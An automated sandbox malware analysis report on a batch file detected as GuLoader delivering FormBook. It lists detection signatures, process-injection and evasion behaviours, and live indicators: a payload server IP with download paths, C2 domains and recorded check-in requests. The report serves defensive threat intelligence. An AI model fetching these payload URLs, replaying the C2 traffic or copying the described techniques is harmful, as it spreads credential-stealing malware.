Windows Analysis Report
Ordine_doc_419024001904.bat

Overview

General Information

Sample name:	Ordine_doc_419024001904.bat
Analysis ID:	1428795
MD5:	fc2d2d71c178fe702dac6ef8f4ab3e03
SHA1:	b2f0157962e4d04966a6348836a07db25dad4833
SHA256:	3d252afaaec1a738e31fe9138e502fcd31a32f388cc55f9aca003ecad30e97b4
Tags:	bat
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

Yara detected FormBook

Yara detected GuLoader

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: ImagingDevices Unusual Parent/Child Processes

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Yara detected FormBook

Source: Yara match	File source: 00000017.00000002.3323646840.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3324620277.0000000001030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3323530542.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3322802619.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2954253289.0000000023890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3324975531.00000000022C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2909221292.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source:	Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2604016007.00000000081C6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb1 source: powershell.exe, 00000006.00000002.2599568793.0000000007214000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2604016007.00000000081C6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe, 00000016.00000000.2822284482.0000000000C8E000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: ATBroker.pdb source: ImagingDevices.exe, 00000014.00000003.2867269299.0000000000652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: ImagingDevices.exe, 00000014.00000003.2806275368.0000000023390000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000014.00000003.2804432675.00000000231EF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ImagingDevices.exe, ImagingDevices.exe, 00000014.00000003.2806275368.0000000023390000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000014.00000003.2804432675.00000000231EF000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2604016007.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5ct source: powershell.exe, 00000006.00000002.2599568793.0000000007214000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ATBroker.pdbGCTL source: ImagingDevices.exe, 00000014.00000003.2867269299.0000000000652000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\AtBroker.exe

Code function: 23_2_003BD1C0 FindFirstFileW,FindNextFileW,FindClose,

23_2_003BD1C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then pop ebx	23_2_003B3070
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then xor eax, eax	23_2_003AAE40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then pop ebx	23_2_003B306F

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49715 -> 47.91.88.207:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49716 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49717 -> 91.195.240.19:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 87.121.105.163 87.121.105.163
Source: Joe Sandbox View	IP Address: 91.195.240.19 91.195.240.19

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163

Source: global traffic	HTTP traffic detected: GET /Skabs.asd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /icjFpYDkBweqyeZ252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /gnbc/?5b=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g==&wD=mjvh1V4x HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.tyaer.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4

Source: unknown

DNS traffic detected: queries for: www.tyaer.com

Source: unknown

HTTP traffic detected: POST /gnbc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,enContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 203Cache-Control: no-cacheHost: www.oyoing.comOrigin: http://www.oyoing.comReferer: http://www.oyoing.com/gnbc/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 35 62 3d 50 33 49 36 68 50 5a 50 74 5a 57 30 50 46 6d 6a 42 38 61 59 30 55 43 58 6b 56 54 67 4e 6a 4b 44 73 47 62 67 4e 58 57 52 36 78 71 4f 73 44 47 58 6d 49 4e 6e 6f 6d 51 76 49 62 6e 6a 64 48 41 4b 2f 7a 46 78 2f 57 56 49 69 48 6a 66 70 79 75 59 69 6c 42 51 68 63 2f 2b 6b 4a 75 77 47 45 31 72 48 48 71 6a 31 6a 78 56 45 38 73 47 65 6c 79 56 6b 57 73 61 47 77 79 45 68 31 5a 79 33 35 43 6d 2f 41 35 6b 49 6b 74 42 33 73 6d 4e 36 4c 44 53 37 67 5a 73 54 30 62 44 58 55 4f 4d 36 4b 39 46 73 67 4b 30 4b 32 74 4f 44 49 6b 51 49 51 62 65 4e 71 79 34 46 52 2f 6b 45 72 52 47 59 65 70 42 6b 4d 58 65 36 75 51 3d Data Ascii: 5b=P3I6hPZPtZW0PFmjB8aY0UCXkVTgNjKDsGbgNXWR6xqOsDGXmINnomQvIbnjdHAK/zFx/WVIiHjfpyuYilBQhc/+kJuwGE1rHHqj1jxVE8sGelyVkWsaGwyEh1Zy35Cm/A5kIktB3smN6LDS7gZsT0bDXUOM6K9FsgK0K2tODIkQIQbeNqy4FR/kErRGYepBkMXe6uQ=

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 19 Apr 2024 14:13:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B04A5309434DC453AF340F166C8EADA5240B601ABB9EC5BBDA006112400Set-Cookie: _csrf=e2a4d2e0ba16d4054b227b720f86f551599c2e8e5779461b23845625c5876bd7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22NA8voDxmQ7upCTE1c5kq_84tqTJ4Ykl-%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 34 31 51 55 7a 79 48 54 61 55 50 68 72 52 59 48 74 54 6a 75 63 48 48 47 4e 66 59 71 33 74 45 4e 68 76 41 4d 38 37 63 4d 58 37 52 7a 47 67 6c 55 38 4d 31 79 46 36 78 77 53 68 64 67 4b 61 49 6f 76 4a 7a 70 6f 65 54 54 7a 42 48 54 34 6f 48 6c 37 64 64 55 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="

Source: powershell.exe, 00000002.00000002.2810711550.000001680CA7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2810711550.000001680E14A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163
Source: ImagingDevices.exe, 00000014.00000002.2912811575.0000000000645000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000014.00000003.2804776512.0000000000642000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000014.00000002.2909299735.0000000000633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/
Source: powershell.exe, 00000002.00000002.2810711550.000001680CA7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/Skabs.asdP
Source: powershell.exe, 00000006.00000002.2592947518.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/Skabs.asdXRsl0
Source: ImagingDevices.exe, 00000014.00000002.2909299735.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000014.00000002.2909299735.000000000061D000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000014.00000002.2909299735.0000000000633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/icjFpYDkBweqyeZ252.bin
Source: ImagingDevices.exe, 00000014.00000002.2909299735.000000000061D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/icjFpYDkBweqyeZ252.binM
Source: ImagingDevices.exe, 00000014.00000002.2909299735.000000000061D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/icjFpYDkBweqyeZ252.binRAw
Source: ImagingDevices.exe, 00000014.00000002.2909299735.000000000061D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/icjFpYDkBweqyeZ252.binT
Source: ImagingDevices.exe, 00000014.00000002.2909299735.0000000000633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/~
Source: powershell.exe, 00000002.00000002.2810711550.000001680E4A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.Hr
Source: powershell.exe, 00000002.00000002.2974478300.000001681C8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2596391958.0000000005739000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2592947518.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2810711550.000001680C851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2592947518.00000000046D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2592947518.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2810711550.000001680C851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2592947518.00000000046D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.2596391958.0000000005739000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2596391958.0000000005739000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2596391958.0000000005739000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.2592947518.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2810711550.000001680DA44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2974478300.000001681C8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2596391958.0000000005739000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000017.00000002.3323646840.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3324620277.0000000001030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3323530542.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3322802619.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2954253289.0000000023890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3324975531.00000000022C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2909221292.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_5616.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000017.00000002.3323646840.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000018.00000002.3324620277.0000000001030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.3323530542.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.3322802619.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.2954253289.0000000023890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000002.3324975531.00000000022C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.2909221292.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2700, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5616, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2852
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2876
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2852	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2876	Jump to behavior

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B35C0 NtCreateMutant,LdrInitializeThunk,	20_2_235B35C0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B2B60 NtClose,LdrInitializeThunk,	20_2_235B2B60
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	20_2_235B2DF0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	20_2_235B2C70
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B4340 NtSetContextThread,	20_2_235B4340
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B3010 NtOpenDirectoryObject,	20_2_235B3010
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B3090 NtSetValueKey,	20_2_235B3090
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B4650 NtSuspendThread,	20_2_235B4650
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B2BF0 NtAllocateVirtualMemory,	20_2_235B2BF0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B2BE0 NtQueryValueKey,	20_2_235B2BE0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B2B80 NtQueryInformationFile,	20_2_235B2B80
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B2BA0 NtEnumerateValueKey,	20_2_235B2BA0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B2AD0 NtReadFile,	20_2_235B2AD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046635C0 NtCreateMutant,LdrInitializeThunk,	23_2_046635C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04664650 NtSuspendThread,LdrInitializeThunk,	23_2_04664650
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04663090 NtSetValueKey,LdrInitializeThunk,	23_2_04663090
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04664340 NtSetContextThread,LdrInitializeThunk,	23_2_04664340
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662C60 NtCreateKey,LdrInitializeThunk,	23_2_04662C60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662C70 NtFreeVirtualMemory,LdrInitializeThunk,	23_2_04662C70
